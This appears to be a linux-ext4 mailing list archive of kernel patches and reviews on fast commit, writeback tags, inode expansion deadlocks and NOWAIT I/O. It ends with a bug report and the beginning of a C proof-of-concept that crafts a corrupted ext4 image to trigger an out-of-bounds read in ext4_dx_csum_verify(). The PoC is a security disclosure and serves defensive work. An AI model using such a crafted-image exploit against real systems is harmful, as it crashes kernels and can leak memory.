* [RFC PATCH v2 0/2] ext4: speed up fast commit on random writes
From: Daejun Park @ 2026-06-23 8:23 UTC (permalink / raw)
To: tytso@mit.edu, adilger.kernel@dilger.ca
Cc: me@linux.beauty, libaokun@linux.alibaba.com,
harshadshirwadkar@gmail.com, yi.zhang@huaweicloud.com,
ojaswin@linux.ibm.com, linux-ext4@vger.kernel.org,
linux-kernel@vger.kernel.org, Daejun Park
In-Reply-To: <CGME20260623082331epcms2p4798e9d26b06f9a005bcca7b2edf395d3@epcms2p4>
Fast commit is meant to make fsync cheap, but on random-write workloads it
defeats itself. ext4 still tracks a single coalesced [min,max] logical range
per inode (i_fc_lblk_start/len). When an inode is dirtied at several disjoint
offsets between two commits, that span widens to cover them all, and at commit
time ext4_fc_snapshot_inode_data() walks the whole span through the extent
status tree -- emitting an ADD_RANGE per mapped segment and a DEL_RANGE per
hole inside it. For scattered writes that is hundreds to thousands of ranges
even though only a handful of regions were actually modified.
The recently merged fast-commit snapshot work did not change this: it caps a
snapshot at EXT4_FC_SNAPSHOT_MAX_RANGES (2048) and fails over to a full commit
when the span exceeds it. Measured on dev (7.1.0-rc4) with a sparse
random-write workload (1 GiB span, R disjoint 4 KiB writes per fsync, 300
fsyncs):
R=16 regions/fsync: ranges/commit 1095, full-commit fallback 76%
(snap_fail_ranges_cap on 226 of 300 fsyncs)
Fast commit barely functions on this workload.
This series tracks the actually-modified disjoint ranges instead of one span,
and snapshots only those:
1/2 replaces the single [min,max] range with a small, bounded set of sorted,
disjoint ranges (up to EXT4_FC_MAX_RANGES = 16; the two closest are
merged on overflow, so the worst case degrades to the old single-span
behaviour). ext4_fc_snapshot_inode_data() then walks only the tracked
ranges. The on-disk TLV format is unchanged.
2/2 allocates the range array lazily: the first range stays inline, the
array is allocated only when a second disjoint range appears, and on an
allocation failure we fall back to the inline single range. Per-inode
fast-commit footprint stays ~20 bytes.
Result on the same workload (dev, patched):
R=16: ranges/commit 1095 -> 16, fallback 76% -> 0.7%,
snap_fail_ranges_cap 226 -> 0
Testing (on dev, patched):
- crash recovery: deterministic writes + fsync, kill -9 QEMU (power loss),
reboot -> fast-commit replay -> verify every fsync'd block, e2fsck -fn.
9600/9600 blocks verified, 0 mismatch, e2fsck clean. Run with R=64, so the
overflow-merge path is exercised.
- ext4/generic fast-commit xfstests (ext4/044 ext4/045 generic/455 456 457
470 482): ext4/044, ext4/045, generic/456 pass; generic/457, 470 skip
(reflink/dax unsupported on ext4); generic/455 fails identically on
unpatched dev (pre-existing, patch-unrelated); generic/482's single failure
in a combined run did not reproduce (3/3 pass in isolation on the patched
kernel).
Changes since v1 [1]:
- Rebased from v6.17-rc3 onto ext4.git dev; re-implemented on top of the
merged fast-commit snapshot model (v1 targeted the old
ext4_fc_write_inode_data(), which no longer exists).
[1] v1: https://lore.kernel.org/linux-ext4/20260611044733epcms2p38013ae683a283555526f70e4eab6d2a9@epcms2p3/
Daejun Park (2):
ext4: fast commit: track disjoint modified ranges per inode
ext4: fast commit: allocate the range array lazily
fs/ext4/ext4.h | 42 ++++++--
fs/ext4/fast_commit.c | 219 +++++++++++++++++++++++++++++++++++-------
fs/ext4/super.c | 1 +
3 files changed, 222 insertions(+), 40 deletions(-)
base-commit: c143957520c6c9b5cd72e0de8b52b814f0c576fe
--
2.43.0
^ permalink raw reply
* [PATCH] ext4: clear stale xarray tags on folios skipped during writeback
From: Gerald Yang @ 2026-06-23 8:02 UTC (permalink / raw)
To: tytso, jack; +Cc: linux-ext4, gerald.yang.tw
In data=journal mode, the writeback thread can hit the
WARN_ON_ONCE(sb_rdonly(sb)) in ext4_journal_check_start() while the
superblock is being remounted read-only during reboot:
Workqueue: writeback wb_workfn (flush-253:0)
RIP: 0010:ext4_journal_check_start+0x8b/0xd0
Call Trace:
__ext4_journal_start_sb+0x3c/0x1e0
mpage_prepare_extent_to_map+0x4af/0x580
ext4_do_writepages+0x3c0/0x1080
ext4_writepages+0xc8/0x1a0
do_writepages+0xc4/0x180
__writeback_single_inode+0x45/0x2f0
writeback_sb_inodes+0x26b/0x5d0
__writeback_inodes_wb+0x54/0x100
wb_writeback+0x1ac/0x320
wb_workfn+0x394/0x470
And followed by the warning:
EXT4-fs warning (device vda1): ext4_evict_inode:195: inode #6263:
comm (sd-umount): data will be lost
This issue is not reproduced every time, but frequently.
The reproduction step is to create a VM with 8 CPUs, 16G memory and
setup data=journal:
sudo tune2fs -o journal_data /dev/vda1
Run fio:
rm -f fiotest
fio --name=fiotest --rw=randwrite --bs=4k --runtime=6 --ioengine=libaio
--iodepth=256 --numjobs=8 --filename=fiotest --filesize=30G
--group_reporting
Reboot the VM, and check the console output from:
virsh console testvm
But there is no dirty inode, folio_clear_dirty_for_io clears PG_dirty
but leaves tags PAGECACHE_TAG_DIRTY and PAGECACHE_TAG_TOWRITE set which
are only cleared by __folio_start_writeback.
In data=journal mode, jbd2 checkpoints the journalled data to its final
location and clears its own dirty flag without touching folio PG_dirty
or xarray dirty flags.
The commit f4a2b42e7891 ("ext4: fix stale xarray tags after writeback")
fixes when PG_dirty is still set but there is no dirty page.
Another case is PG_dirty is cleared, but PAGECACHE_TAG_DIRTY and
PAGECACHE_TAG_TOWRITE is still set. In this case, writeback thread
checks clean folio and skips it in mpage_prepare_extent_to_map:
if (!folio_test_dirty(folio) ||
...
folio_unlcok(folio);
continue
And never reaches ext4_bio_write_folio where the commit f4a2b42e7891
clears the stale xarray tags. Print debug logs after the filesystem
is remounted read-only:
writepages RDONLY nrpages=2048 dirtytag=1 wbtag=0 towrite=1 sync=0
And all folios are actually clean:
folio idx=3 dirty=0 wb=0 checked=0 dirtybuf=0 jbddirty=0 mapped=1
...
We need to clear the xarray stale tags for such clean folios by
cycling them through writeback in the skip path, the same way
f4a2b42e7891 does in ext4_bio_write_folio.
Fixes: dff4ac75eeee ("ext4: move keep_towrite handling to ext4_bio_write_page()")
Signed-off-by: Gerald Yang <gerald.yang@canonical.com>
---
fs/ext4/inode.c | 22 ++++++++++++++++++++++
1 file changed, 22 insertions(+)
diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index ce99807c5f5b..40da611b0831 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -2698,6 +2698,28 @@ static int mpage_prepare_extent_to_map(struct mpage_da_data *mpd)
(folio_test_writeback(folio) &&
(mpd->wbc->sync_mode == WB_SYNC_NONE)) ||
unlikely(folio->mapping != mapping)) {
+ /*
+ * A clean folio (PG_dirty = 0) can still carry
+ * stale xarray tags: PAGECACHE_TAG_DIRTY /
+ * PAGECACHE_TAG_TOWRITE.
+ * In data=journal mode, the data may have been
+ * checkpointed to its final location by jbd2
+ * but these tags are only cleared by
+ * __folio_start_writeback() later.
+ * These tags keep the inode on the writeback
+ * list and make the writeback thread calls
+ * ext4_journal_start on a read-only sb during
+ * remounting fs to read-only, and return
+ * -EROFS from ext4_journal_check_start.
+ * Cycle the clean folio through writeback to
+ * drop the stale xarray tags.
+ */
+ if (folio->mapping == mapping &&
+ !folio_test_dirty(folio) &&
+ !folio_test_writeback(folio)) {
+ __folio_start_writeback(folio, false);
+ folio_end_writeback(folio);
+ }
folio_unlock(folio);
continue;
}
--
2.43.0
^ permalink raw reply related
* [PATCH 2/2] ext4: set EXT4_STATE_NO_EXPAND in ext4_evict_inode
From: Yun Zhou @ 2026-06-23 6:19 UTC (permalink / raw)
To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang
Cc: linux-ext4, linux-kernel, yun.zhou
In-Reply-To: <20260623061903.2148767-1-yun.zhou@windriver.com>
An inode being evicted will never need its extra isize expanded. Set
EXT4_STATE_NO_EXPAND before ext4_mark_inode_dirty() in ext4_evict_inode()
to make this explicit and prevent any unnecessary work in
ext4_try_to_expand_extra_isize().
This also provides defense-in-depth for the s_writepages_rwsem deadlock
during mount-time orphan cleanup, ensuring the expand path is blocked
for inodes under eviction regardless of how they are reached.
Signed-off-by: Yun Zhou <yun.zhou@windriver.com>
Reviewed-by: Jan Kara <jack@suse.cz>
---
fs/ext4/inode.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index a5409324d965..0d131371ad3d 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -264,6 +264,7 @@ void ext4_evict_inode(struct inode *inode)
if (ext4_inode_is_fast_symlink(inode))
memset(EXT4_I(inode)->i_data, 0, sizeof(EXT4_I(inode)->i_data));
inode->i_size = 0;
+ ext4_set_inode_state(inode, EXT4_STATE_NO_EXPAND);
err = ext4_mark_inode_dirty(handle, inode);
if (err) {
ext4_warning(inode->i_sb,
--
2.43.0
^ permalink raw reply related
* [PATCH 1/2] ext4: skip extra isize expansion during mount to prevent deadlock
From: Yun Zhou @ 2026-06-23 6:19 UTC (permalink / raw)
To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang
Cc: linux-ext4, linux-kernel, yun.zhou
ext4_try_to_expand_extra_isize() is called from __ext4_mark_inode_dirty()
while holding an active jbd2 handle. During mount (!SB_ACTIVE), the
expand path may move xattrs to external blocks and release ea_inodes via
iput(). When !SB_ACTIVE, iput() calls write_inode_now() which acquires
s_writepages_rwsem, creating a circular lock dependency:
s_writepages_rwsem --> jbd2_handle --> xattr_sem --> s_writepages_rwsem
This can be triggered via:
ext4_process_orphan() -> ext4_truncate() -> ext4_mark_inode_dirty()
-> ext4_try_to_expand_extra_isize()
or:
ext4_evict_inode() -> ext4_mark_inode_dirty()
-> ext4_try_to_expand_extra_isize()
Skip expansion when !SB_ACTIVE. This is a minor loss of functionality
(extra isize won't grow for these inodes during mount), which e2fsck
can resolve later if needed.
Reported-by: syzbot+5d19358d7eb30ffb0cc5@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=5d19358d7eb30ffb0cc5
Fixes: c8585c6fcaf2 ("ext4: fix races between changing inode journal mode and ext4_writepages")
Signed-off-by: Yun Zhou <yun.zhou@windriver.com>
Reviewed-by: Jan Kara <jack@suse.cz>
---
fs/ext4/inode.c | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index ce99807c5f5b..a5409324d965 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -6510,6 +6510,16 @@ static int ext4_try_to_expand_extra_isize(struct inode *inode,
if (ext4_test_inode_state(inode, EXT4_STATE_NO_EXPAND))
return -EOVERFLOW;
+ /*
+ * Skip expansion during mount (!SB_ACTIVE). Expanding extra isize
+ * may move xattrs to external blocks and release ea_inodes via iput.
+ * When !SB_ACTIVE, iput triggers write_inode_now() which acquires
+ * s_writepages_rwsem, causing a deadlock with the caller's active
+ * jbd2 handle (lock order: s_writepages_rwsem -> jbd2_handle).
+ */
+ if (unlikely(!(inode->i_sb->s_flags & SB_ACTIVE)))
+ return -EBUSY;
+
/*
* In nojournal mode, we can immediately attempt to expand
* the inode. When journaled, we first need to obtain extra
--
2.43.0
^ permalink raw reply related
* Re: [PATCH v2 8/8] ext4: handle IOCB_NOWAIT in ext4_dio_needs_zeroing() with cache-only lookup
From: Zhang Yi @ 2026-06-23 3:45 UTC (permalink / raw)
To: Baokun Li, linux-ext4
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, peng_wang
In-Reply-To: <20260618125735.4156639-9-libaokun@linux.alibaba.com>
On 6/18/2026 8:57 PM, Baokun Li wrote:
> Add a nowait parameter to ext4_dio_needs_zeroing() and pass
> EXT4_GET_BLOCKS_CACHED_NOWAIT flag to ext4_map_blocks() when
> IOCB_NOWAIT is set. This ensures the needs_zeroing check only uses
> cached extent info. If cache misses, ext4_map_blocks() returns
> -EAGAIN, causing ext4_dio_needs_zeroing() to conservatively return
> true (needs zeroing). The caller then tries to upgrade to exclusive
> lock, which returns -EAGAIN for NOWAIT, avoiding potential sleep on
> down_read(i_data_sem).
>
> The caller in ext4_dio_write_checks() is updated to pass the
> IOCB_NOWAIT flag from the kiocb.
>
> Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
Looks good to me.
Reviewed-by: Zhang Yi <yi.zhang@huawei.com>
> ---
> fs/ext4/file.c | 14 ++++++++++----
> 1 file changed, 10 insertions(+), 4 deletions(-)
>
> diff --git a/fs/ext4/file.c b/fs/ext4/file.c
> index 5ffc1afd8050..44d1658d2b5a 100644
> --- a/fs/ext4/file.c
> +++ b/fs/ext4/file.c
> @@ -228,7 +228,8 @@ ext4_extending_io(struct inode *inode, loff_t offset, size_t len)
> * unwritten conversion for middle blocks are protected by i_data_sem
> * and inode_dio_begin().
> */
> -static bool ext4_dio_needs_zeroing(struct inode *inode, loff_t pos, loff_t len)
> +static bool ext4_dio_needs_zeroing(struct inode *inode, loff_t pos, loff_t len,
> + bool nowait)
> {
> struct ext4_map_blocks map;
> unsigned int blkbits = inode->i_blkbits;
> @@ -236,10 +237,14 @@ static bool ext4_dio_needs_zeroing(struct inode *inode, loff_t pos, loff_t len)
> bool head_partial, tail_partial;
> ext4_lblk_t head_lblk, tail_lblk;
> int err;
> + int map_flags = 0;
>
> if (pos + len > i_size_read(inode))
> return true;
>
> + if (nowait)
> + map_flags = EXT4_GET_BLOCKS_CACHED_NOWAIT;
> +
> head_partial = (pos & blockmask) != 0;
> tail_partial = ((pos + len) & blockmask) != 0;
> head_lblk = pos >> blkbits;
> @@ -249,7 +254,7 @@ static bool ext4_dio_needs_zeroing(struct inode *inode, loff_t pos, loff_t len)
> if (head_partial) {
> map.m_lblk = head_lblk;
> map.m_len = tail_lblk - head_lblk + 1;
> - err = ext4_map_blocks(NULL, inode, &map, 0);
> + err = ext4_map_blocks(NULL, inode, &map, map_flags);
> if (err <= 0 || !(map.m_flags & EXT4_MAP_MAPPED))
> return true;
> /* If this mapping already covers the tail block, we're done. */
> @@ -261,7 +266,7 @@ static bool ext4_dio_needs_zeroing(struct inode *inode, loff_t pos, loff_t len)
> if (tail_partial) {
> map.m_lblk = tail_lblk;
> map.m_len = 1;
> - err = ext4_map_blocks(NULL, inode, &map, 0);
> + err = ext4_map_blocks(NULL, inode, &map, map_flags);
> if (err <= 0 || !(map.m_flags & EXT4_MAP_MAPPED))
> return true;
> }
> @@ -516,7 +521,8 @@ static ssize_t ext4_dio_write_checks(struct kiocb *iocb, struct iov_iter *from,
> * under shared lock is safe.
> */
> if (ext4_unaligned_io(inode, from, offset))
> - needs_zeroing = ext4_dio_needs_zeroing(inode, offset, count);
> + needs_zeroing = ext4_dio_needs_zeroing(inode, offset, count,
> + iocb->ki_flags & IOCB_NOWAIT);
>
> /* Determine whether we need to upgrade to an exclusive lock. */
> if (*ilock_shared &&
^ permalink raw reply
* Re: [PATCH v2 7/8] ext4: handle IOMAP_NOWAIT in ext4_iomap_begin() with cache-only lookup
From: Zhang Yi @ 2026-06-23 3:40 UTC (permalink / raw)
To: Baokun Li, linux-ext4
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, peng_wang
In-Reply-To: <20260618125735.4156639-8-libaokun@linux.alibaba.com>
On 6/18/2026 8:57 PM, Baokun Li wrote:
> Pass EXT4_GET_BLOCKS_CACHED_NOWAIT flag to ext4_map_blocks() when
> IOMAP_NOWAIT is set, ensuring that extent lookups only use the cached
> extent status tree. If the cache misses, ext4_map_blocks() returns
> -EAGAIN instead of sleeping on down_read(i_data_sem) to read extent
> tree from disk.
>
> This applies to both write and read paths in ext4_iomap_begin(),
> allowing DIO/DAX operations with RWF_NOWAIT to avoid blocking on
> extent tree lookups.
>
> Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
Looks good to me.
Reviewed-by: Zhang Yi <yi.zhang@huawei.com>
> ---
> fs/ext4/inode.c | 11 +++++++++--
> 1 file changed, 9 insertions(+), 2 deletions(-)
>
> diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
> index 03adbca3ec78..09f85cd6c118 100644
> --- a/fs/ext4/inode.c
> +++ b/fs/ext4/inode.c
> @@ -3781,6 +3781,7 @@ static int ext4_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
> struct ext4_map_blocks map;
> u8 blkbits = inode->i_blkbits;
> unsigned int orig_mlen;
> + int map_flags = 0;
>
> if ((offset >> blkbits) > EXT4_MAX_LOGICAL_BLOCK)
> return -EINVAL;
> @@ -3795,6 +3796,12 @@ static int ext4_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
> map.m_len = min_t(loff_t, (offset + length - 1) >> blkbits,
> EXT4_MAX_LOGICAL_BLOCK) - map.m_lblk + 1;
> orig_mlen = map.m_len;
> + /*
> + * In NOWAIT context, only use cached extent info. If es cache misses,
> + * return -EAGAIN to avoid sleeping on down_read(i_data_sem).
> + */
> + if (flags & IOMAP_NOWAIT)
> + map_flags = EXT4_GET_BLOCKS_CACHED_NOWAIT;
>
> if (flags & IOMAP_WRITE) {
> /*
> @@ -3804,7 +3811,7 @@ static int ext4_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
> * especially in multi-threaded overwrite requests.
> */
> if (offset + length <= i_size_read(inode)) {
> - ret = ext4_map_blocks(NULL, inode, &map, 0);
> + ret = ext4_map_blocks(NULL, inode, &map, map_flags);
> /*
> * For DAX we convert extents to initialized ones before
> * copying the data, otherwise we do it after I/O so
> @@ -3825,7 +3832,7 @@ static int ext4_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
> }
> ret = ext4_iomap_alloc(inode, &map, flags);
> } else {
> - ret = ext4_map_blocks(NULL, inode, &map, 0);
> + ret = ext4_map_blocks(NULL, inode, &map, map_flags);
> }
>
> if (ret < 0)
^ permalink raw reply
* Re: [PATCH v2 5/8] ext4: use kiocb_modified instead of file_modified in DIO/DAX write path
From: Zhang Yi @ 2026-06-23 3:16 UTC (permalink / raw)
To: Baokun Li, linux-ext4
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, peng_wang
In-Reply-To: <20260618125735.4156639-6-libaokun@linux.alibaba.com>
On 6/18/2026 8:57 PM, Baokun Li wrote:
> file_modified() passes flags=0 which drops IOCB_NOWAIT, causing
> file_update_time() to sleep in ext4_journal_start() via
> ext4_dirty_inode() even in non-blocking contexts.
>
> kiocb_modified(iocb) propagates iocb->ki_flags so that
> generic_update_time() correctly returns -EAGAIN when IOCB_NOWAIT
> is set and ->dirty_inode could block, matching the behavior
> already adopted by XFS, FUSE, and ext2.
>
> Affected paths:
> - ext4_dio_write_checks(): DIO NOWAIT write
> - ext4_write_checks(): shared by buffered (rejects NOWAIT upfront)
> and DAX write (supports NOWAIT)
>
> ext4_fallocate() in extents.c is not affected as it has no kiocb.
>
> Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
Ha, this looks good to me.
Reviewed-by: Zhang Yi <yi.zhang@huawei.com>
> ---
> fs/ext4/file.c | 6 +++---
> 1 file changed, 3 insertions(+), 3 deletions(-)
>
> diff --git a/fs/ext4/file.c b/fs/ext4/file.c
> index 2681f148e7b8..5ffc1afd8050 100644
> --- a/fs/ext4/file.c
> +++ b/fs/ext4/file.c
> @@ -307,7 +307,7 @@ static ssize_t ext4_write_checks(struct kiocb *iocb, struct iov_iter *from)
> if (count <= 0)
> return count;
>
> - ret = file_modified(iocb->ki_filp);
> + ret = kiocb_modified(iocb);
> if (ret)
> return ret;
>
> @@ -465,7 +465,7 @@ static const struct iomap_dio_ops ext4_dio_write_ops = {
> *
> * The decision is layered, evaluated in this order:
> *
> - * 1. If file_modified() needs to update security info (!IS_NOSEC), upgrade
> + * 1. If kiocb_modified() needs to update security info (!IS_NOSEC), upgrade
> * to the exclusive lock -- the security update itself requires it,
> * regardless of whether the write extends the file or is aligned.
> *
> @@ -555,7 +555,7 @@ static ssize_t ext4_dio_write_checks(struct kiocb *iocb, struct iov_iter *from,
> *dio_flags = IOMAP_DIO_FORCE_WAIT;
> }
>
> - ret = file_modified(file);
> + ret = kiocb_modified(iocb);
> if (ret < 0)
> goto out;
>
^ permalink raw reply
* Re: [PATCH v2 2/8] ext4: drain in-flight DIO before buffered write fallback
From: Zhang Yi @ 2026-06-23 3:11 UTC (permalink / raw)
To: Baokun Li, linux-ext4
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, peng_wang
In-Reply-To: <20260618125735.4156639-3-libaokun@linux.alibaba.com>
On 6/18/2026 8:57 PM, Baokun Li wrote:
> generic/746 started failing intermittently on ext3 (no-extent inodes).
> The test triggers 'Page cache invalidation failure on direct I/O'
> warnings and subsequent fsync returns -EIO. Adding a 50ms delay
> between ext4_buffered_write_iter() and filemap_write_and_wait_range()
> in ext4_dio_write_iter() makes the race almost always reproducible.
>
> On no-extent inodes, DIO writes to holes cannot use unwritten extents,
> so ext4_iomap_alloc() leaves m_flags=0 and ext4_map_blocks() returns 0.
> The iomap layer then returns -ENOTBLK, causing fallback to buffered I/O.
>
> The fallback path in ext4_dio_write_iter() calls
> ext4_buffered_write_iter() which dirties pages, then does flush and
> invalidate. However, there's an unprotected window between
> ext4_buffered_write_iter() returning (with inode lock released) and
> the subsequent flush+invalidate.
>
> Concurrent async DIO completions from other threads can run
> kiocb_invalidate_post_direct_write() during this window. If pages have
> been re-dirtied, post-invalidation finds dirty pages and triggers the
> warning, setting -EIO in the error sequence.
>
> Consider a file with two 4k extents: [hole][written]. Thread A does
> DIO to the written extent, while thread B does DIO spanning both:
>
> kworker A (4k DIO, allocated block) kworker B (8k DIO, fallback)
> ----------------------------------- ----------------------------
> inode_lock_shared() inode_lock_shared()
> iomap_dio_rw(): iomap_dio_rw():
> kiocb_invalidate_pages -> clean iomap_begin -> -ENOTBLK
> submit_bio (async) dio->size = 0
> inode_unlock_shared() inode_unlock_shared()
>
> [bio pending in block layer] /* fallback: lock released */
> ext4_buffered_write_iter()
> inode_lock(exclusive)
> generic_perform_write()
> -> dirty pages [0, 8k]
> inode_unlock(exclusive)
>
> /* pages dirty, no lock */
> [bio completes] filemap_write_and_wait_range()
> iomap_dio_complete() -> flush dirty pages
> kiocb_invalidate_post_direct_write() invalidate_mapping_pages()
> invalidate_inode_pages2_range()
> -> finds dirty page!
> -> dio_warn_stale_pagecache()
> -> errseq_set(-EIO)
>
> This issue can be triggered through normal I/O paths, not just
> intentionally overlapping DIO writes from userspace. For example,
> generic/746 uses a loop device where multiple kworkers issue concurrent
> I/O to the backing file. Additionally, when block_size < folio_size,
> non-overlapping DIO writes that share a large folio can also trigger
> the race.
>
> Add inode_dio_wait() in ext4_buffered_write_iter() before
> generic_perform_write() to drain all in-flight DIO. This ensures
> that all DIO clears existing pages before submitting IO (via
> kiocb_invalidate_pages()), and all BIO waits for all DIO to
> complete (via inode_dio_wait()), thus eliminating the race.
>
> Fixes: 378f32bab371 ("ext4: introduce direct I/O write using iomap infrastructure")
> Suggested-by: Zhang Yi <yi.zhang@huawei.com>
> Link: https://patch.msgid.link/d1adcf7c-c276-458d-9cac-68a4410f7626@gmail.com
> Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
Looks good to me.
Reviewed-by: Zhang Yi <yi.zhang@huawei.com>
> ---
> fs/ext4/file.c | 6 ++++++
> 1 file changed, 6 insertions(+)
>
> diff --git a/fs/ext4/file.c b/fs/ext4/file.c
> index eb1a323962b1..9f9bc0b13772 100644
> --- a/fs/ext4/file.c
> +++ b/fs/ext4/file.c
> @@ -313,6 +313,12 @@ static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
> if (ret <= 0)
> goto out;
>
> + /*
> + * Prevent concurrent DIO and BIO to the same file range.
> + * Wait for all in-flight DIO to complete before dirtying pages.
> + */
> + inode_dio_wait(inode);
> +
> ret = generic_perform_write(iocb, from);
>
> out:
^ permalink raw reply
* Re: [PATCH v2 1/8] ext4: prevent sleeping allocation in NOWAIT write path
From: Zhang Yi @ 2026-06-23 2:56 UTC (permalink / raw)
To: Baokun Li, linux-ext4
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, peng_wang,
Sashiko
In-Reply-To: <20260618125735.4156639-2-libaokun@linux.alibaba.com>
On 6/18/2026 8:57 PM, Baokun Li wrote:
> Block allocation requires journal access which may sleep, violating
> NOWAIT semantics. Return -EAGAIN early when IOMAP_NOWAIT is set,
> allowing the caller to retry without the NOWAIT constraint.
>
> This ensures that write paths using IOMAP_NOWAIT (e.g., DIO with
> RWF_NOWAIT) will not block on journal operations when blocks need
> to be allocated.
>
> Reported-by: Sashiko <sashiko-bot@kernel.org>
> Closes: https://sashiko.dev/#/patchset/20260611163441.2431805-1-libaokun@linux.alibaba.com?part=1
> Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
This makes sense to me.
Reviewed-by: Zhang Yi <yi.zhang@huawei.com>
> ---
> fs/ext4/inode.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
> index c2c2d6ac7f3d..832794294ccf 100644
> --- a/fs/ext4/inode.c
> +++ b/fs/ext4/inode.c
> @@ -3672,6 +3672,9 @@ static int ext4_iomap_alloc(struct inode *inode, struct ext4_map_blocks *map,
> int ret, dio_credits, m_flags = 0, retries = 0;
> bool force_commit = false;
>
> + if (flags & IOMAP_NOWAIT)
> + return -EAGAIN;
> +
> /*
> * Trim the mapping request to the maximum value that we can map at
> * once for direct I/O.
^ permalink raw reply
* Re: [PATCH v3 01/10] ext4: replace ext4_dir_entry with ext4_dir_entry_2
From: XIAO WU @ 2026-06-22 17:29 UTC (permalink / raw)
To: Artem Blagodarenko, linux-ext4; +Cc: adilger.kernel, Andreas Dilger
In-Reply-To: <20260619191022.27008-2-ablagodarenko@thelustrecollective.com>
Hi Artem,
I came across the Sashiko AI review [1] of this patch and was able to
reproduce a kernel crash triggered by a missing bounds check in
ext4_dx_csum_verify(). Although the review notes this is a pre-existing
issue (not introduced by your patch), I wanted to share the concrete
reproduction evidence since this patch touches the same function.
On Fri, Jun 19, 2026 at 03:10:05PM -0400, Artem Blagodarenko wrote:
> @@ -456,7 +456,7 @@ static __le32 ext4_dx_csum(struct inode *inode,
struct ext4_dir_entry *dirent,
> }
>
> static int ext4_dx_csum_verify(struct inode *inode,
> - struct ext4_dir_entry *dirent)
> + struct ext4_dir_entry_2 *dirent)
> {
> struct dx_countlimit *c;
> struct dx_tail *t;
The problem is in the validation logic inside this function:
c = get_dx_countlimit(inode, dirent, &count_offset);
limit = le16_to_cpu(c->limit);
count = le16_to_cpu(c->count); // ← read from disk, never
validated
if (count_offset + (limit * sizeof(struct dx_entry)) >
EXT4_BLOCK_SIZE(inode->i_sb) - sizeof(struct dx_tail)) {
warn_no_space_for_csum(inode);
return 0;
}
t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
size = count_offset + (count * sizeof(struct dx_entry)); // ← uses
unvalidated count
csum = ext4_chksum(ei->i_csum_seed, (__u8 *)dirent, size);
→ crc32c() reads `size` bytes from bh->b_data
The `limit` value is bounds-checked against the block size, but `count`
is never validated. If a corrupted or maliciously crafted filesystem
sets `count` to a large value like 65535, the computation:
size = count_offset + (65535 * 8) = ~524288 bytes
causes crc32c() to read far past the 4096-byte buffer_head allocation.
Why KASAN reports this as use-after-free rather than out-of-bounds:
The buffer_head's b_data is a kmalloc'd slab object. When crc32c()
reads hundreds of kilobytes past the end of this 4K slab allocation, it
crosses into adjacent slab pages. Those pages contain memory that was
previously allocated and freed (old dentries, inode structures, etc.).
KASAN's quarantine poisons freed slab objects, so the access lands on a
poisoned freed page and triggers the slab-use-after-free detector:
BUG: KASAN: use-after-free in crc32c+0x32a/0x380
Read of size 1 at addr ffff88802ca54000 by task poc/10993
The crash is deterministic with a crafted image and triggers on any
directory read (getdents64 / ls).
[Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]
Call Trace:
<TASK>
dump_stack_lvl
print_report
kasan_report
crc32c+0x32a/0x380
__ext4_read_dirblock+0x90f/0xbb0
dx_probe+0xbb/0x1670
ext4_htree_fill_tree+0x50e/0xb30
ext4_readdir+0x241b/0x39d0
iterate_dir+0x29b/0xaf0
__x64_sys_getdents64+0x140/0x2c0
do_syscall_64+0x129/0x880
entry_SYSCALL_64_after_hwframe+0x77/0x7f
</TASK>
The PoC is attached below. It creates a 64 MB ext4 image with
metadata_csum and dir_index, fills a directory with 800 files to
trigger htree indexing, unmounts, then corrupts the dx_countlimit's
count field via direct block write before remounting and listing the
directory.
gcc -o poc poc.c -static
[1]
https://sashiko.dev/#/patchset/20260619191022.27008-1-ablagodarenko%40thelustrecollective.com
(Sashiko AI code review — "Out-of-Bounds Access", Severity: High)
Thanks,
XIAO
// PoC: OOB read via unvalidated count in ext4_dx_csum_verify()
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/syscall.h>
#include <stdint.h>
#define IMG_PATH "poc_ext4.img"
#define MNT_PATH "poc_mnt"
#define IMG_SIZE (64 * 1024 * 1024)
#define BLCK_SIZE 4096
int main(int argc, char **argv)
{
char cmd[4096];
int img_fd, ret;
char loop_dev[64] = {0};
unsigned char buf[BLCK_SIZE];
printf("[*] ext4 dx_csum count OOB PoC\n");
/* Cleanup from previous runs */
system("umount poc_mnt 2>/dev/null");
system("losetup -d /dev/loop0 2>/dev/null");
system("rm -rf poc_mnt poc_ext4.img 2>/dev/null");
mkdir(MNT_PATH, 0755);
/* Create and format image with metadata_csum + dir_index */
printf("[*] Creating 64 MB image, formatting ext4...\n");
img_fd = open(IMG_PATH, O_CREAT | O_RDWR | O_TRUNC, 0644);
if (img_fd < 0) { perror("open"); return 1; }
ftruncate(img_fd, IMG_SIZE);
close(img_fd);
snprintf(cmd, sizeof(cmd),
